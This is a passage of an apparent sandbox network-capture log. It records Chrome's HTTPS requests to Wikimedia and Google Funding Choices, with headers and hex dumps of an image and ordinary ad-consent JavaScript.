                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC1913INData Raw: 64 3d 6b 3d 30 3b 6b 3c 61 2e 6c 65 6e 67 74 68 2d 32 3b 6b 2b 3d 33 29 7b 76 61 72 20 67 3d 61 5b 6b 5d 2c 68 3d 61 5b 6b 2b 31 5d 3b 66 3d 61 5b 6b 2b 32 5d 3b 6d 3d 62 5b 67 3e 3e 32 5d 3b 67 3d 62 5b 28 67 26 33 29 3c 3c 34 7c 68 3e 3e 34 5d 3b 68 3d 62 5b 28 68 26 31 35 29 3c 3c 32 7c 66 3e 3e 36 5d 3b 66 3d 62 5b 66 26 36 33 5d 3b 63 5b 64 2b 2b 5d 3d 6d 2b 67 2b 68 2b 66 7d 6d 3d 30 3b 66 3d 65 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 6b 29 7b 63 61 73 65 20 32 3a 6d 3d 61 5b 6b 2b 31 5d 2c 66 3d 62 5b 28 6d 26 31 35 29 3c 3c 32 5d 7c 7c 65 3b 63 61 73 65 20 31 3a 61 3d 61 5b 6b 5d 2c 63 5b 64 5d 3d 62 5b 61 3e 3e 32 5d 2b 62 5b 28 61 26 33 29 3c 3c 34 7c 6d 3e 3e 34 5d 2b 66 2b 65 7d 61 3d 63 2e 6a 6f 69 6e 28 22 22 29 7d 72 65 74 75 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: d=k=0;k<a.length-2;k+=3){var g=a[k],h=a[k+1];f=a[k+2];m=b[g>>2];g=b[(g&3)<<4|h>>4];h=b[(h&15)<<2|f>>6];f=b[f&63];c[d++]=m+g+h+f}m=0;f=e;switch(a.length-k){case 2:m=a[k+1],f=b[(m&15)<<2]||e;case 1:a=a[k],c[d]=b[a>>2]+b[(a&3)<<4|m>>4]+f+e}a=c.join("")}retur


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      25192.168.2.449810185.15.59.2404437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC431OUTGET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC1068INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 11:48:50 GMT
                                                                                                                                                                                                                                                                                                                      etag: e78b7bd4e07bfd2389ecb0c9baf2d9c4
                                                                                                                                                                                                                                                                                                                      server: ATS/9.2.5
                                                                                                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Microsoft_.NET_logo.svg.png
                                                                                                                                                                                                                                                                                                                      last-modified: Thu, 11 Jul 2024 08:02:42 GMT
                                                                                                                                                                                                                                                                                                                      content-length: 6633
                                                                                                                                                                                                                                                                                                                      age: 23438
                                                                                                                                                                                                                                                                                                                      x-cache: cp3077 hit, cp3077 hit/51
                                                                                                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3077"
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                                                                                                      x-client-ip: 173.254.250.77
                                                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC6633INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 03 00 00 00 dc ff 43 fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 df 50 4c 54 45 51 2b d4 e8 e4 f9 ff ff ff fe fd ff 78 5a de a8 95 ea 5d 3a d7 63 41 d8 d1 c6 f4 8c 72 e2 e0 d9 f7 54 2f d5 a0 8b e8 f8 f7 fd 68 47 da ce c3 f3 ef eb fb 5d 39 d7 b8 a9 ed 79 5c de e1 da f8 a4 90 e8 f9 f8 fd 69 48 da d3 c9 f4 52 2c d4 8f 77 e3 f1 ee fc 5f 3c d7 bb ad ee fe fe ff 7e 62 df e5 df f9 56 32 d5 a7 94 e9 fa f9 fe 6d 4d db d4 cb f4 93 7b e4 f2 ef fc 60 3d d8 bf b1 ef 7f 64 df e6 e0 f9 aa 98 ea fb fa fe 6e 4e db d6 cd f5 96 7f e5 f5 f3 fc c2 b5 f0 84
                                                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRCgAMAa cHRMz&u0`:pQ<PLTEQ+xZ]:cArT/hG]9y\iHR,w_<~bV2mM{`=dnN


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      26192.168.2.449816142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC878OUTGET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC1913INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:32 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EUwpyqbBQ98v7SgVbAEIbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw05BikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhXg4tkzp38kmMOH79_VMShpJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalF8UYGRiaGBsYGegYG8QUGAIkOQBE"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC60INData Raw: 33 36 0d 0a 77 69 6e 64 6f 77 5b 27 61 63 37 65 36 30 35 39 2d 31 34 32 35 2d 34 63 34 61 2d 39 30 32 33 2d 61 38 36 61 65 32 38 36 39 37 37 61 27 5d 20 3d 20 74 72 75 65 3b 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 36window['ac7e6059-1425-4c4a-9023-a86ae286977a'] = true;
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      27192.168.2.449815142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC845OUTPOST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 155
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC155OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 36 39 35 33 34 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: [null,null,null,null,null,null,null,null,1730398769534,null,null,[[1,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC1862INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:32 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UBpud_m9l6W1eNetb35txA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmLw0JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4uHYMqV_J5vAhMvfNzMpuSTlF8Yn5-eVpOaV6CamFOuC2EWZSaUl-UUo7NQykIqc_PT0zLz0eCMDIxNDA2MDPQPj-AIDADFFKMs"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      28192.168.2.449818142.250.186.1744437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC826OUTGET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC1937INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:32 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4U3cJ6ADriiwF2duhUDSqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw15BikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhXg4tkzp38kmMGPJ6hNMShpJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalF8UYGRiaGBsYGegYG8QUGAGs4P4A"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC1937INData Raw: 32 38 31 37 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 5f 2e 73
                                                                                                                                                                                                                                                                                                                      Data Ascii: 2817if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var To=function(a){if(!a)return null;a=_.s
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC1937INData Raw: 6c 3f 5f 2e 4b 28 61 2c 32 29 3a 6e 75 6c 6c 29 26 26 0a 61 3d 3d 3d 31 26 26 5f 2e 46 6e 28 63 2c 31 30 2c 21 30 29 3b 62 28 63 29 7d 3b 76 61 72 20 6a 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 3d 5b 5d 7d 3b 6a 70 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 69 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 61 2c 5b 62 5d 2e 63 6f 6e 63 61 74 28 5f 2e 68 61 28 5f 2e 47 63 2e 61 70 70 6c 79 28 30 2c 61 72 67 75 6d 65 6e 74 73 29 29 29 29 7d 29 7d 3b 6a 70 2e 70 72 6f 74 6f 74 79 70 65 2e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5f 2e 47 63 2e 61 70 70 6c 79 28 30 2c 61 72 67
                                                                                                                                                                                                                                                                                                                      Data Ascii: l?_.K(a,2):null)&&a===1&&_.Fn(c,10,!0);b(c)};var jp=function(){this.i=[]};jp.prototype.addEventListener=function(a,b){this.i.push(function(){a.call.apply(a,[b].concat(_.ha(_.Gc.apply(0,arguments))))})};jp.prototype.g=function(){for(var a=_.Gc.apply(0,arg
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:32 UTC1937INData Raw: 61 2c 31 29 3b 57 6f 28 62 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 70 28 61 2c 30 29 3b 57 6f 28 62 29 7d 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 70 28 61 2c 32 29 7d 29 7d 3b 0a 76 61 72 20 4a 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 62 2e 63 6c 61 73 73 4e 61 6d 65 3d 61 2e 6f 3b 62 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 3b 62 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 30 30 30 30 70 78 22 3b 62 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 22 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 39
                                                                                                                                                                                                                                                                                                                      Data Ascii: a,1);Wo(b)},function(){np(a,0);Wo(b)})},function(){np(a,2)})};var Jp=function(a){var b=document.createElement("div");b.className=a.o;b.style.width="1px";b.style.height="1px";b.style.position="absolute";b.style.left="-10000px";b.style.top="-"+Math.floor(9
